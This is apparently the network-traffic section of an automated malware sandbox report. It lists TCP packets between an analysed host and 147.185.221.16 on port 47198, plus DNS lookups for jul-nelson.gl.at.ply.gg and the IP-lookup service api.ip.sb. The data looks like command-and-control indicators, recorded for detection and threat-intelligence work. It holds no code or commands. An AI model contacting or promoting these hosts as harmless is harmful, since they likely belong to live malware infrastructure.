Sep 19, 2023 21:07:57.833972931 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.834299088 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.834362030 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.834469080 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.834523916 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.834894896 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.835047960 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.835231066 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.835288048 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.955120087 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.955220938 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.955365896 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.955413103 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.955425024 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.955470085 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.955728054 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.955782890 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.955782890 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.955836058 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.956216097 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.956273079 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.956422091 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.956485987 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.956851006 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.956904888 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.956927061 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.957032919 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.957382917 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.957452059 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.957537889 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.957684040 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.958391905 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.958447933 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.958462000 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.958463907 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.958507061 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.958534002 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.958610058 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.958667040 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.959623098 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.959650993 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.959667921 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.959696054 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.959717989 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.959726095 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.959769011 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.959944963 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.959959984 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960000038 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960012913 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960092068 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960146904 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960524082 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960577965 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960719109 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960753918 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960778952 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960800886 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.960859060 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.960911989 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.961096048 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.961147070 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.961301088 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.961357117 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.961569071 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.961618900 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.961643934 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.961740017 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.961802959 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.961853981 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.962265968 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.962352991 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.962516069 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.962580919 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.962688923 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.962759972 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.963318110 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.963375092 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.963438988 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.963515997 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.963531971 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.963597059 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.963984013 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.964057922 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.964098930 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.964159012 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.964616060 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.964689016 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.964703083 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.964766026 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.964818001 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.964874029 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.965245962 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.965306044 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.965398073 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.965461969 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.965897083 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.965951920 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.965967894 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966017008 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966466904 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.966533899 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.966536999 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966576099 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966584921 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.966594934 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966641903 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.966882944 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.966950893 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967530966 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967592001 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967622042 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967657089 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967673063 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967706919 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967720032 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967757940 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967760086 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967808008 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.967808962 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.967860937 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.968322992 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.968377113 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.968385935 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.968440056 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.968640089 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.968705893 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.969969988 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.970043898 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.970135927 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.970192909 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.970227003 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.970273018 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.970290899 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.971040964 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.971097946 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.971138954 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.001518011 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.001619101 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.192626953 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.192728043 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193048954 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193064928 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193097115 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193131924 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193595886 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193655968 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193759918 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193794012 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193808079 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193826914 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.193856955 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.193873882 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.194106102 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.194173098 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.194431067 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.194484949 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.195499897 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.195574045 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.315370083 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.315395117 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.315412045 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.315522909 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.315562963 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.315799952 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.315859079 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.316812038 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.316848993 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.316889048 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.316983938 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.317332983 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.317560911 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.317761898 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.318310022 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.318417072 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.318586111 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.318882942 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.319312096 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.319737911 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.320012093 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.320189953 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.320224047 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.320425034 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.320457935 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321125031 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321197987 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321276903 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321310043 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321424007 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321700096 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.321733952 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.322242975 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.322959900 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.322987080 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.323045015 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.324747086 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.324845076 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.324891090 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.324949980 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.325093985 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.328799009 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.328833103 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.328902006 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.328933954 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.328986883 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329062939 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329116106 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329195976 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329257965 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329390049 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329576969 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329844952 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.329879999 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.330133915 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.330187082 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339000940 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339179039 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339222908 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339298010 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339329958 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339631081 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339663029 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.339714050 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.340154886 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.340213060 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.340251923 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.340565920 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.340745926 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.341928959 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.342411995 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.342943907 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343019962 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343075037 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343146086 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343195915 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343250036 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343333006 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343372107 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343413115 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343486071 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343528986 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343580961 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343625069 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343647003 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.343682051 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.343700886 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343899965 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.343962908 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344357014 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344744921 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344798088 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344866991 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344897985 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.344958067 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.345038891 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.363831997 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.363867044 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.363948107 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.363960981 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.554214954 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554260015 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554318905 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554335117 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554351091 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554402113 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554415941 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554477930 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554510117 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554625034 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554714918 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554877043 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554959059 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.554994106 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555058956 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555090904 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555171013 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555203915 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555236101 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555906057 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.555979967 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.560256958 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.675632000 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.676748991 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.677021027 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.677067995 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.677476883 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.677967072 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.678009033 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.678605080 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.678662062 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.704397917 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.704492092 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.704507113 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.704983950 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.705298901 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.724123001 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.759594917 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:58.814300060 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.981337070 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:58.981647968 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:59.093259096 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:59.093307972 CEST	49714	47198	192.168.2.6	147.185.221.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2023 21:07:28.020653009 CEST	49701	53	192.168.2.6	8.8.8.8
Sep 19, 2023 21:07:28.126461983 CEST	53	49701	8.8.8.8	192.168.2.6
Sep 19, 2023 21:07:34.704159021 CEST	53023	53	192.168.2.6	8.8.8.8
Sep 19, 2023 21:07:34.816653967 CEST	54502	53	192.168.2.6	8.8.8.8
Sep 19, 2023 21:07:37.180495024 CEST	54394	53	192.168.2.6	8.8.8.8
Sep 19, 2023 21:07:37.286955118 CEST	53	54394	8.8.8.8	192.168.2.6
Sep 19, 2023 21:07:54.407263041 CEST	51596	53	192.168.2.6	8.8.8.8
Sep 19, 2023 21:07:54.513254881 CEST	53	51596	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2023 21:07:28.020653009 CEST	192.168.2.6	8.8.8.8	0x51d3	Standard query (0)	jul-nelson.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Sep 19, 2023 21:07:34.704159021 CEST	192.168.2.6	8.8.8.8	0xb81b	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Sep 19, 2023 21:07:34.816653967 CEST	192.168.2.6	8.8.8.8	0x5159	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Sep 19, 2023 21:07:37.180495024 CEST	192.168.2.6	8.8.8.8	0xadca	Standard query (0)	jul-nelson.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Sep 19, 2023 21:07:54.407263041 CEST	192.168.2.6	8.8.8.8	0xd15d	Standard query (0)	jul-nelson.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 19, 2023 21:07:28.126461983 CEST	8.8.8.8	192.168.2.6	0x51d3	No error (0)	jul-nelson.gl.at.ply.gg		147.185.221.16	A (IP address)	IN (0x0001)	false
